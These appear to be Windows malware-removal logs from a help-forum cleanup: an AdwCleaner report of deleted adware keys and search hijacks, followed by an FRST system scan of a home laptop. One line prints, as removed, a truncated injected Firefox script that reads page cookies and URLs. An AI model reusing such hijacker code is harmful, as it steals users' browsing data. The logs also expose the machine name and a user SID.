Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{13119113-0854-469D-807A-171568457991}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33119133-0854-469D-807A-171568457991}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{03119103-0854-469D-807A-171568457991}
[#] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{04D2B915-19FF-41E9-994D-95DC898BEA43}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{5D79F641-C168-40DF-A32F-BACEA7509E75}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C98D5B61-B0EA-4D48-9839-1079D352D880}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{CB41FC95-F1B3-4797-8BB6-1012FF62ABBA}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{04D2B915-19FF-41E9-994D-95DC898BEA43}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F02C0832-C85C-4B93-8C6F-9DF20121A10D}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89CC5A31-B592-4BB3-82F5-BD8ACA3E0BF0}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C98D5B61-B0EA-4D48-9839-1079D352D880}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{C98D5B61-B0EA-4D48-9839-1079D352D880}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{0696F815-A3A9-490A-BB14-9EC3350B1276}]
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{a5b9c0f5-5616-47cd-a95f-e43b488faccf}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B13C4182-9A7F-4F29-B480-F668606BC906}
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\TelevisionFanatic
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Software\adawarebp
Key Deleted : HKCU\Software\AppDataLow\Software\TelevisionFanatic
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\TelevisionFanatic
Key Deleted : HKLM\SOFTWARE\Trymedia Systems
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TelevisionFanaticbar Uninstall
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16476

Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v33.0.3 (x86 en-US)

[xdxtk8zr.default\prefs.js] - Line Deleted : user_pref("extensions.HElMs8NivVoSsx0S.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.indexOf(\[...]

-\\ Google Chrome v38.0.2125.111

[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://astromenda.com/results.php?f=4&q={searchTerms}&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Extension] : pfkfdlcdbajamklbneflfbcmfgddmpae
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Homepage] : hxxp://astromenda.com/?f=1&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=
[C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\preferences] - Deleted [Startup_URLs] : hxxp://astromenda.com/?f=7&a=ast_ir_14_45_ff&cd=2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDtDyCtCzzzytAyC0F0DtN0D0Tzu0StCtDyEtBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2StB0C0DyD0AyEyByCtG0CtCyDzytGzyyC0AzztGzy0A0EyEtGtC0Ezy0ByBzyzy0C0EzyyEtA2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0E0FtB0AtAtC0DtG0B0C0A0EtGyEzz0C0DtG0Azz0DtDtGyB0BtDtDzytD0CyC0EyE0C0D2Q&cr=582993201&ir=

*************************

AdwCleaner[R0].txt - [8658 octets] - [10/11/2014 10:26:01]
AdwCleaner[R1].txt - [9232 octets] - [10/11/2014 14:32:16]
AdwCleaner[S0].txt - [9067 octets] - [10/11/2014 14:34:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [9127 octets] ##########
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 09-11-2014 01
Ran by Mom (administrator) on MOM-PC on 11-11-2014 07:25:54
Running from C:\Users\Mom\Desktop
Loaded Profile: Mom (Available profiles: Mom)
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Kaspersky Lab ZAO) C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Kaspersky Lab ZAO) C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\Utilities\KeNotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Kaspersky Lab ZAO) C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\klwtblfs.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-29] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7625248 2009-07-28] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1545512 2009-07-20] (Synaptics Incorporated)
HKLM\...\Run: [SVPWUTIL] => C:\Program Files\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2009-07-09] (TOSHIBA CORPORATION)
HKLM\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [425984 2009-06-02] (TOSHIBA Electronics, Inc.)
HKLM\...\Run: [KeNotify] => C:\Program Files\TOSHIBA\Utilities\KeNotify.exe [34088 2009-01-13] (TOSHIBA CORPORATION)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [476512 2009-08-05] (TOSHIBA Corporation)
HKLM\...\Run: [SmoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [460088 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [738616 2009-08-05] (TOSHIBA Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [611672 2009-09-17] (TOSHIBA Corporation)
HKLM\...\Run: [NortonOnlineBackupReminder] => C:\Program Files\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-07-16] (Toshiba)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKU\S-1-5-21-2731384514-3676459448-2700856802-1001\...\Run: [MyTOSHIBA] => C:\Program Files\TOSHIBA\My Toshiba\MyToshiba.exe [264048 2009-08-06] (TOSHIBA)
HKU\S-1-5-21-2731384514-3676459448-2700856802-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-08-27] (Google Inc.)
HKU\S-1-5-21-2731384514-3676459448-2700856802-1001\...\MountPoints2: {19d6c12e-2ff6-11e1-afee-88ae1d506189} - F:\LaunchU3.exe -a
Startup: C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
SearchScopes: HKLM - DefaultScope value is missing.
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\xdxtk8zr.default
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\windows\system32\Adobe\Director\np32dsw_1166636.dll (Adobe Systems, Inc.)
FF Plugin: @kaspersky.com/content_blocker -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] ()
FF Plugin: @kaspersky.com/online_banking -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] ()
FF Plugin: @kaspersky.com/virtual_keyboard -> C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @TelevisionFanatic.com/Plugin -> C:\Program Files\TelevisionFanatic\bar\1.bin\NP64Stub.dll No File
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files\WildTangent Games\App\BrowserIntegration\Registered\10\NP_wtapp.dll ()
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]
FF Extension: Ngăn chặn trang web nguy hiểm - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014-11-09]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]
FF Extension: Bàn phím ảo - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014-11-09]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]
FF Extension: Công cụ kiểm tra liên kết của Kaspersky - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014-11-09]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]
FF Extension: Chặn quảng cáo - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014-11-09]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]
FF Extension: An toàn giao dịch tài chính - C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected] [2014-11-09]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.111\gcswf32.dll No File
CHR Plugin: (Shockwave Flash) - C:\windows\system32\Macromed\Flash\NPSWF32_11_3_300_271.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll No File
CHR Plugin: (Java Deployment Toolkit 6.0.140.8) - C:\Program Files\Java\jre6\bin\new_plugin\npdeploytk.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 6 U14) - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\windows\system32\Adobe\Director\np32dsw_1166636.dll (Adobe Systems, Inc.)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll No File
CHR Profile: C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-08-07]
CHR Extension: (ApptoU) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnfghhpmgeifbilieglncablibafbhdd [2014-11-08]
CHR Extension: (Kaspersky Protection) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-11-09]
CHR Extension: (Google Wallet) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-26]
CHR Extension: (PotatoSmile) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\oalbpfagfhfkcmklpdanadjpbfdedndn [2014-11-08]
CHR HKLM\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.googl...jjmlmojhbllhbho []
CHR StartMenuInternet: Google Chrome - chrome.exe

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVP15.0.0; C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe [233552 2014-04-20] (Kaspersky Lab ZAO)
R2 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2009-08-10] (TOSHIBA CORPORATION)
R2 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-10] (TOSHIBA CORPORATION)
S3 GamesAppIntegrationService; C:\Program Files\WildTangent Games\App\GamesAppIntegrationService.exe [255040 2014-09-11] (WildTangent)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2009-09-17] (TOSHIBA Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 kl1; C:\windows\System32\DRIVERS\kl1.sys [135264 2014-02-20] (Kaspersky Lab ZAO)
R3 klflt; C:\windows\System32\DRIVERS\klflt.sys [112136 2014-11-09] (Kaspersky Lab ZAO)
R1 klhk; C:\windows\System32\DRIVERS\klhk.sys [34400 2014-04-10] (Kaspersky Lab ZAO)
R1 KLIF; C:\windows\System32\DRIVERS\klif.sys [644808 2014-11-09] (Kaspersky Lab ZAO)
R1 KLIM6; C:\windows\System32\DRIVERS\klim6.sys [25696 2014-02-25] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\windows\System32\DRIVERS\klkbdflt.sys [24672 2014-03-28] (Kaspersky Lab ZAO)
R3 klmouflt; C:\windows\System32\DRIVERS\klmouflt.sys [25696 2013-08-08] (Kaspersky Lab ZAO)
R1 klpd; C:\windows\System32\DRIVERS\klpd.sys [14432 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\windows\System32\DRIVERS\kltdi.sys [45024 2014-03-25] (Kaspersky Lab ZAO)
R1 kneps; C:\windows\System32\DRIVERS\kneps.sys [145888 2014-03-26] (Kaspersky Lab ZAO)
R0 LPCFilter; C:\windows\System32\DRIVERS\LPCFilter.sys [36208 2009-07-02] (COMPAL ELECTRONIC INC.)
S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-11-09] (Malwarebytes Corporation)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 RTL8187Se; C:\windows\System32\DRIVERS\RTL8187Se.sys [333824 2008-08-22] (Realtek Semiconductor Corporation                           ) [File not signed]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-11 07:25 - 2014-11-11 07:28 - 00018302 _____ () C:\Users\Mom\Desktop\FRST.txt
2014-11-11 07:24 - 2014-11-11 07:24 - 00000000 ____D () C:\windows\system32\SPReview
2014-11-10 14:57 - 2014-11-10 14:57 - 00012004 _____ () C:\Users\Mom\Desktop\otl_removal.txt
2014-11-10 14:46 - 2014-11-10 14:46 - 00000000 ____D () C:\_OTL
2014-11-10 14:45 - 2014-11-10 14:29 - 00002894 _____ () C:\Users\Mom\Desktop\gtg_script_1.txt
2014-11-10 10:40 - 2014-11-10 10:46 - 00153253 _____ () C:\Users\Mom\Desktop\gtg1.txt
2014-11-10 10:36 - 2014-11-10 10:36 - 00002594 _____ () C:\Users\Mom\Desktop\mbrfix.txt
2014-11-10 10:36 - 2014-11-10 10:36 - 00000512 _____ () C:\Users\Mom\Desktop\MBR.dat
2014-11-10 10:25 - 2014-11-10 14:34 - 00000000 ____D () C:\AdwCleaner
